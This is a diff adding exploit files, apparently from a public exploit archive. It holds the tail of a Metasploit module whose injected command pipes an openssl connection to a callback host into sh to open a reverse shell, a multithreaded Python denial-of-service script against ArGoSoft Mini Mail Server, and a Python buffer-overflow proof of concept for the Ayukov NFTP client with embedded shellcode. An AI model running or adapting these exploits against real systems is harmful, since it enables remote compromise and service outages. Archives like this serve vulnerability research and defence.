+    cmd = "\nping ;s=$IFS;openssl${s}s_client$s-quiet$s-host${s}#{cbhost}$s-port${s}#{cbport}|sh;ping$s-c${s}1${s}0\n"
+    sock.put(cmd)
+
+    # Give time for our command to be queued and executed
+    1.upto(5) do
+      Rex.sleep(1)
+      break if session_created?
+    end
+  end
+
+  def stage_final_payload(cli)
+    print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...")
+    cli.put(payload.encoded + "\n")
+  end
+
+  def start_listener(ssl = false)
+    comm = datastore['ListenerComm']
+    if comm == 'local'
+      comm = ::Rex::Socket::Comm::Local
+    else
+      comm = nil
+    end
+
+    self.service = Rex::Socket::TcpServer.create(
+      'LocalPort' => datastore['CBPORT'],
+      'SSL'       => ssl,
+      'SSLCert'   => datastore['SSLCert'],
+      'Comm'      => comm,
+      'Context'   =>
+      {
+        'Msf'        => framework,
+        'MsfExploit' => self
+      }
+    )
+
+    self.service.on_client_connect_proc = proc { |client|
+      stage_final_payload(client)
+    }
+
+    # Start the listening service
+    self.service.start
+  end
+
+  # Shut down any running services
+  def cleanup
+    super
+    if self.service
+      print_status("Shutting down payload stager listener...")
+      begin
+        self.service.deref if self.service.is_a?(Rex::Service)
+        if self.service.is_a?(Rex::Socket)
+          self.service.close
+          self.service.stop
+        end
+        self.service = nil
+      rescue ::Exception
+      end
+    end
+  end
+
+  # Accessor for our TCP payload stager
+  attr_accessor :service
+end
--- a/platforms/windows/dos/43026.py
+++ b/platforms/windows/dos/43026.py
@ -0,0 +1,62 @@
+#!/usr/bin/env python
+# coding: utf-8
+
+############ Description: ##########
+# The vulnerability was discovered during a vulnerability research lecture.
+#
+# Denial-of-service vulnerability in ArGoSoft Mini Mail Server 1.0.0.2
+# and earlier allows remote attackers to waste CPU resources (memory
+# consumption) via unspecified vectors.
+####################################
+
+# Exploit Title: ArGoSoft Mini Mail Server - DoS (Memory Consumption)
+# Date: 2017-10-21
+# Exploit Author: Berk Cem Göksel
+# Contact: twitter.com/berkcgoksel || bgoksel.com
+# Vendor Homepage: http://www.argosoft.com
+# Software Link: http://www.argosoft.com/rootpages/MiniMail/Default.aspx
+# Version:  1.0.0.2
+# Tested on: Windows 10
+# Category: Windows Remote Denial-of-Service
+# CVE : CVE-2017-15223
+
+
+import socket
+from threading import Thread
+
+def data():
+
+    ip = '127.0.0.1'
+    port = 25
+    counter = 50
+    string = '&'
+
+    while True:
+        try:
+            if counter >= 10000:
+                counter = 0
+            else:
+
+                counter = counter + 50
+                A = (string * counter) + 'user2@othermail.com'
+                print "String lenght: " + str(len(A))
+
+                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+                sock.settimeout(5.0)
+                sock.connect((ip, port))
+                sock.send('HELO localhost\r\n' + 'MAIL FROM: user1@somemail.com\r\n' + 'RCPT TO: ' + A + '\r\nDATA\r\nMessage-ID:1224\r\SDFGQUIL\r\n"."\r\n' + 'QUIT\r\n')
+                sock.recv(1024)
+                sock.close()
+
+        except Exception as e:
+            continue
+
+def main():
+    iterations = int(input("Threads: "))
+    for i in range(iterations):
+        t = Thread(target=data)
+        t.start()
+
+if __name__ == '__main__':
+    main()
+
--- a/platforms/windows/remote/43025.py
+++ b/platforms/windows/remote/43025.py
@ -0,0 +1,69 @@
+#!/usr/bin/env python
+# coding: utf-8
+
+############ Description: ##########
+# The vulnerability was discovered during a vulnerability research lecture.
+# This is meant to be a PoC.
+####################################
+
+# Exploit Title: Ayukov NFTP FTP Client - Buffer Overflow
+# Date: 2017-10-21
+# Exploit Author: Berk Cem Göksel
+# Contact: twitter.com/berkcgoksel || bgoksel.com
+# Vendor Homepage: http://ayukov.com/nftp/source-release.html
+# Software Link: ftp://ftp.ayukov.com/pub/nftp/
+# Version:  v1.71, v1.72, v1.8, v2.0
+# Tested on: Windows 10
+# Category: Windows Remote Exploit
+# CVE : CVE-2017-15222
+
+import socket
+
+IP = '127.0.0.1'
+port = 21
+
+
+#(exec calc.exe)
+shellcode=(
+"\xda\xc5\xbe\xda\xc6\x9a\xb6\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1"
+"\x33\x83\xc5\x04\x31\x75\x13\x03\xaf\xd5\x78\x43\xb3\x32\xf5"
+"\xac\x4b\xc3\x66\x24\xae\xf2\xb4\x52\xbb\xa7\x08\x10\xe9\x4b"
+"\xe2\x74\x19\xdf\x86\x50\x2e\x68\x2c\x87\x01\x69\x80\x07\xcd"
+"\xa9\x82\xfb\x0f\xfe\x64\xc5\xc0\xf3\x65\x02\x3c\xfb\x34\xdb"
+"\x4b\xae\xa8\x68\x09\x73\xc8\xbe\x06\xcb\xb2\xbb\xd8\xb8\x08"
+"\xc5\x08\x10\x06\x8d\xb0\x1a\x40\x2e\xc1\xcf\x92\x12\x88\x64"
+"\x60\xe0\x0b\xad\xb8\x09\x3a\x91\x17\x34\xf3\x1c\x69\x70\x33"
+"\xff\x1c\x8a\x40\x82\x26\x49\x3b\x58\xa2\x4c\x9b\x2b\x14\xb5"
+"\x1a\xff\xc3\x3e\x10\xb4\x80\x19\x34\x4b\x44\x12\x40\xc0\x6b"
+"\xf5\xc1\x92\x4f\xd1\x8a\x41\xf1\x40\x76\x27\x0e\x92\xde\x98"
+"\xaa\xd8\xcc\xcd\xcd\x82\x9a\x10\x5f\xb9\xe3\x13\x5f\xc2\x43"
+"\x7c\x6e\x49\x0c\xfb\x6f\x98\x69\xf3\x25\x81\xdb\x9c\xe3\x53"
+"\x5e\xc1\x13\x8e\x9c\xfc\x97\x3b\x5c\xfb\x88\x49\x59\x47\x0f"
+"\xa1\x13\xd8\xfa\xc5\x80\xd9\x2e\xa6\x47\x4a\xb2\x07\xe2\xea"
+"\x51\x58")
+
+CALL_ESP = "\xdd\xfc\x40\x00" # call esp - nftpc.exe  #0040FCDD
+buff = "A" * 4116 + CALL_ESP + '\x90' * 16 + shellcode + "C" * (15000-4116-4-16-len(shellcode))
+#Can call esp but the null byte terminates the string.
+
+try:
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.bind((IP, port))
+        s.listen(20)
+        print("[i] FTP Server started on port: "+str(port)+"\r\n")
+except:
+        print("[!] Failed to bind the server to port: "+str(port)+"\r\n")
+
+while True:
+    conn, addr = s.accept()
+    conn.send('220 Welcome!' + '\r\n')
+    print conn.recv(1024)
+    conn.send('331 OK.\r\n')
+    print conn.recv(1024)
+    conn.send('230 OK.\r\n')
+    print conn.recv(1024)
+    conn.send(buff + '\r\n')
+    print conn.recv(1024)
+    conn.send('257' + '\r\n')
+
+